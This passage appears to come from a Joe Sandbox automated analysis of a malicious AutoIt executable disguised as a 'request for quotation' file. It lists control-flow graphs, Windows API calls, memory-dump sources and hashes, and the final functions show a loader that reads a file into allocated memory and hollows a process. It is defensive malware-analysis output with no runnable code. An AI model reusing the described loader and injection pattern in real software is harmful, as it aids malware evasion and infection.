                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0043E947
                                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 0043E9A0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                              • API String ID: 2673923337-2727554177
                                                                                                                                                                                                                              • Opcode ID: 11a4a3c91bccf0a78efa524780f2de3e74fbfd1818abf5b9f609df4b82d2a059
                                                                                                                                                                                                                              • Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11a4a3c91bccf0a78efa524780f2de3e74fbfd1818abf5b9f609df4b82d2a059
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1365 403633-403681 1367 4036e1-4036e3 1365->1367 1368 403683-403686 1365->1368 1367->1368 1369 4036e5 1367->1369 1370 4036e7 1368->1370 1371 403688-40368f 1368->1371 1372 4036ca-4036d2 DefWindowProcW 1369->1372 1373 4036ed-4036f0 1370->1373 1374 43d0cc-43d0fa call 411070 call 411093 1370->1374 1375 403695-40369a 1371->1375 1376 40374b-403753 PostQuitMessage 1371->1376 1378 4036d8-4036de 1372->1378 1379 4036f2-4036f3 1373->1379 1380 403715-40373c SetTimer RegisterWindowMessageW 1373->1380 1408 43d0ff-43d106 1374->1408 1382 4036a0-4036a2 1375->1382 1383 43d154-43d168 call 462527 1375->1383 1377 403711-403713 1376->1377 1377->1378 1385 4036f9-40370c KillTimer call 40443a call 403114 1379->1385 1386 43d06f-43d072 1379->1386 1380->1377 1388 40373e-403749 CreatePopupMenu 1380->1388 1389 403755-403764 call 4044a0 1382->1389 1390 4036a8-4036ad 1382->1390 1383->1377 1402 43d16e 1383->1402 1385->1377 1395 43d074-43d076 1386->1395 1396 43d0a8-43d0c7 MoveWindow 1386->1396 1388->1377 1389->1377 1391 4036b3-4036b8 1390->1391 1392 43d139-43d140 1390->1392 1400 43d124-43d134 call 462d36 1391->1400 1401 4036be-4036c4 1391->1401 1392->1372 1407 43d146-43d14f call 457c36 1392->1407 1404 43d097-43d0a3 SetFocus 1395->1404 1405 43d078-43d07b 1395->1405 1396->1377 1400->1377 1401->1372 1401->1408 1402->1372 1404->1377 1405->1401 1409 43d081-43d092 call 411070 1405->1409 1407->1372 1408->1372 1413 43d10c-43d11f call 40443a call 40434a 1408->1413 1409->1377 1413->1372
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
                                                                                                                                                                                                                              • KillTimer.USER32(?,00000001), ref: 004036FC
                                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
                                                                                                                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0040373E
                                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 0040374D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                              • String ID: TaskbarCreated$%I
                                                                                                                                                                                                                              • API String ID: 129472671-1195164674
                                                                                                                                                                                                                              • Opcode ID: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                                                                                                                                                                              • Instruction ID: dec945db719cbeb7d7ffc5e313a4f07f26295059660cff28048481092df75402
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 966edbd5f2e312d4ba3a9f2ebc71c219dc323684879314e6e103aa33e8c5c9c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F34127B1110505ABDB246F68EC09F7E3E98EB44302F50453BF602A63E1C67EAD95972E

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00403A50
                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
                                                                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 00403A76
                                                                                                                                                                                                                              • LoadIconW.USER32(000000A4), ref: 00403A88
                                                                                                                                                                                                                              • LoadIconW.USER32(000000A2), ref: 00403A9A
                                                                                                                                                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
                                                                                                                                                                                                                              • RegisterClassExW.USER32(?), ref: 00403B16
                                                                                                                                                                                                                                • Part of subcall function 00403041: GetSysColorBrush.USER32(0000000F), ref: 00403074
                                                                                                                                                                                                                                • Part of subcall function 00403041: RegisterClassExW.USER32(00000030), ref: 0040309E
                                                                                                                                                                                                                                • Part of subcall function 00403041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
                                                                                                                                                                                                                                • Part of subcall function 00403041: InitCommonControlsEx.COMCTL32(?), ref: 004030CC
                                                                                                                                                                                                                                • Part of subcall function 00403041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
                                                                                                                                                                                                                                • Part of subcall function 00403041: LoadIconW.USER32(000000A9), ref: 004030F2
                                                                                                                                                                                                                                • Part of subcall function 00403041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                                                                                                                              • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                                                                                                                                                              • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: f3b2a67ba4737bf340ccd7156652abcca8b73e61870248da86ee233e4e9feb40
                                                                                                                                                                                                                              • Instruction ID: af0522e5d3063f6fdae7a48ed59c0aca245d97b28f83adb6a4b709605a6e755e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3b2a67ba4737bf340ccd7156652abcca8b73e61870248da86ee233e4e9feb40
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EA27A7190D3C08FC735CB1AC854BAABBE1AFD5328F094A5DE49897292D335AD05CB93

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                                                                                                                                                                                              • API String ID: 1825951767-3937808951
                                                                                                                                                                                                                              • Opcode ID: 9a848ba383e8bd6d24f5c7cba39f5f86a93176ae2475154dec2db13a8f04a170
                                                                                                                                                                                                                              • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a848ba383e8bd6d24f5c7cba39f5f86a93176ae2475154dec2db13a8f04a170
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                                                                                                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                                                                                                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                                                                                                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                                                                                                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                                                                                                                                                                • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                                                                                                                                                                • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                              • String ID: <WL$\TL$%I$SL
                                                                                                                                                                                                                              • API String ID: 1986988660-4199584472
                                                                                                                                                                                                                              • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                                                                                                                                                              • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 2031 c92648-c926f6 call c90008 2034 c926fd-c92723 call c93558 CreateFileW 2031->2034 2037 c9272a-c9273a 2034->2037 2038 c92725 2034->2038 2046 c9273c 2037->2046 2047 c92741-c9275b VirtualAlloc 2037->2047 2039 c92875-c92879 2038->2039 2040 c928bb-c928be 2039->2040 2041 c9287b-c9287f 2039->2041 2043 c928c1-c928c8 2040->2043 2044 c9288b-c9288f 2041->2044 2045 c92881-c92884 2041->2045 2050 c928ca-c928d5 2043->2050 2051 c9291d-c92932 2043->2051 2052 c9289f-c928a3 2044->2052 2053 c92891-c9289b 2044->2053 2045->2044 2046->2039 2048 c9275d 2047->2048 2049 c92762-c92779 ReadFile 2047->2049 2048->2039 2054 c9277b 2049->2054 2055 c92780-c927c0 VirtualAlloc 2049->2055 2056 c928d9-c928e5 2050->2056 2057 c928d7 2050->2057 2058 c92942-c9294a 2051->2058 2059 c92934-c9293f VirtualFree 2051->2059 2060 c928b3 2052->2060 2061 c928a5-c928af 2052->2061 2053->2052 2054->2039 2062 c927c2 2055->2062 2063 c927c7-c927e2 call c937a8 2055->2063 2064 c928f9-c92905 2056->2064 2065 c928e7-c928f7 2056->2065 2057->2051 2059->2058 2060->2040 2061->2060 2062->2039 2071 c927ed-c927f7 2063->2071 2068 c92912-c92918 2064->2068 2069 c92907-c92910 2064->2069 2067 c9291b 2065->2067 2067->2043 2068->2067 2069->2067 2072 c927f9-c92828 call c937a8 2071->2072 2073 c9282a-c9283e call c935b8 2071->2073 2072->2071 2078 c92840 2073->2078 2079 c92842-c92846 2073->2079 2078->2039 2081 c92848-c9284c CloseHandle 2079->2081 2082 c92852-c92856 2079->2082 2081->2082 2083 c92858-c92863 VirtualFree 2082->2083 2084 c92866-c9286f 2082->2084 2083->2084 2084->2034 2084->2039
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00C92719
                                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C9293F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1685491022.0000000000C90000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFileFreeVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 204039940-0
                                                                                                                                                                                                                              • Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                                                                                                                                                              • Instruction ID: 7b99c4d9fa34ee7db33dc115aa27bdc77e64d5a187b17b88f94de15212b1c55f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5A11575E00209EBDF14CFA4C898BEEBBB5BF48304F208159E551BB280D7799A80DF64

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 2162 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$CreateShow
                                                                                                                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                              • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                                                                                                                                                              • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 2515 c923b8-c92542 call c90008 call c922a8 CreateFileW 2522 c92549-c92559 2515->2522 2523 c92544 2515->2523 2526 c9255b 2522->2526 2527 c92560-c9257a VirtualAlloc 2522->2527 2524 c925fc-c92601 2523->2524 2526->2524 2528 c9257c 2527->2528 2529 c9257e-c92598 ReadFile 2527->2529 2528->2524 2530 c9259a 2529->2530 2531 c9259c-c925d6 call c922e8 call c912a8 2529->2531 2530->2524 2536 c925d8-c925ed call c92338 2531->2536 2537 c925f2-c925fa ExitProcess 2531->2537 2536->2537 2537->2524
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00C922A8: Sleep.KERNEL32(000001F4), ref: 00C922B9
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C92535
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1685491022.0000000000C90000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFileSleep
                                                                                                                                                                                                                              • String ID: TOPESQHTX016QGN6GO0U7L1GQ1KU03
                                                                                                                                                                                                                              • API String ID: 2694422964-1363200935
                                                                                                                                                                                                                              • Opcode ID: b5a399686789f8953d6451f494963cd68cba2f81384b40ad697cc109d960a69d
                                                                                                                                                                                                                              • Instruction ID: 9d868eacb71dc4de088715da90da789d9124d6188c624aa06de56623801dee01
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5a399686789f8953d6451f494963cd68cba2f81384b40ad697cc109d960a69d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5719730D0438CEAEF11D7A4C8597DEBB75AF19304F004199E6587B2C1D7B90B49CB65

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 2539 40407c-404092 2540 404098-4040ad call 407a16 2539->2540 2541 40416f-404173 2539->2541 2544 4040b3-4040d3 call 407bcc 2540->2544 2545 43d3c8-43d3d7 LoadStringW 2540->2545 2548 43d3e2-43d3fa call 407b2e call 406fe3 2544->2548 2549 4040d9-4040dd 2544->2549 2545->2548 2558 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2548->2558 2561 43d400-43d41e call 407cab call 406fe3 call 407cab 2548->2561 2551 4040e3-4040e8 call 407b2e 2549->2551 2552 404174-40417d call 408047 2549->2552 2551->2558 2552->2558 2558->2541 2561->2558
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                                                                                                                                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004040FC
                                                                                                                                                                                                                              • _wcscpy.LIBCMT ref: 00404150
                                                                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                                                                                              • String ID: Line:
                                                                                                                                                                                                                              • API String ID: 3942752672-1585850449
                                                                                                                                                                                                                              • Opcode ID: 10912e09208b45abc9c2cc978c7dbabd8f3e61ea168010fa27cd79705b1b1fc4
                                                                                                                                                                                                                              • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10912e09208b45abc9c2cc978c7dbabd8f3e61ea168010fa27cd79705b1b1fc4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(?,00000000), ref: 00C91AD5
                                                                                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C91AF9
